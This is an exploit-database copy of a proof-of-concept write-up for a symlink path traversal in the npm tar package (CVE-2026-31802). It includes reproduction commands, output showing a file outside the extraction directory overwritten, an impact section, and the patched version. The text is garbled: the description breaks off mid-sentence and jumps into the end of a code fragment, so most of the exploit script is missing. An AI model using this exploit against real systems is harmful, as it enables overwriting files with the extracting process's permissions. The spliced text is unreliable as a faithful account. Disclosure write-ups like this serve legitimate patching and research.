## https://sploitus.com/exploit?id=3E88350D-5E20-5699-A994-CE5ED19ACE9B
# CVE-2026-31802: tar Symlink Path Traversal / Arbitrary File Overwrite
**Research:** [Joshua van Rijswijk](https://github.com/Jvr2022)
## Description
This repository contains my proof of concept and write-up for **CVE-2026-31802**, a high-severity vulnerability in the npm `tar` package (`node-tar`) affecting versions ` {
fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
process.stdout.write(fs.readFileSync(target, 'utf8'))
})
```
## Reproduction
### Install a vulnerable version
```
npm install tar@7.5.10
```
### Run the PoC
```
node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt
```
### Observed output
```
PWNED
../../../target.txt
lrwxrwxrwx ... a/b/l -> ../../../target.txt
-rw-r--r-- ... ../target.txt
```
`PWNED` confirms that the file outside the extraction directory was overwritten.
The `readlink` output and file listing show that the extracted symlink points outside the intended extraction root.
## Impact
This issue gives an attacker an **arbitrary file overwrite primitive outside the intended extraction directory**, with the permissions of the process performing extraction.
Realistic scenarios include:
* CLI tools extracting untrusted tarballs into a working directory
* build and update pipelines consuming third-party archives
* services that import user-supplied tar files
* developer tooling that automatically unpacks bundles or artifacts
In those environments, a crafted archive can cause writes to land outside the directory the application expects to control.
## Affected Versions
* Affected: `tar <= 7.5.10`
* Patched: `tar 7.5.11`
## Fix
This issue was patched in **`7.5.11`**.
Users should upgrade immediately:
```
npm install tar@^7.5.11
```
## References
* GitHub Advisory: GHSA-9ppj-qmqm-q256
* CVE: CVE-2026-31802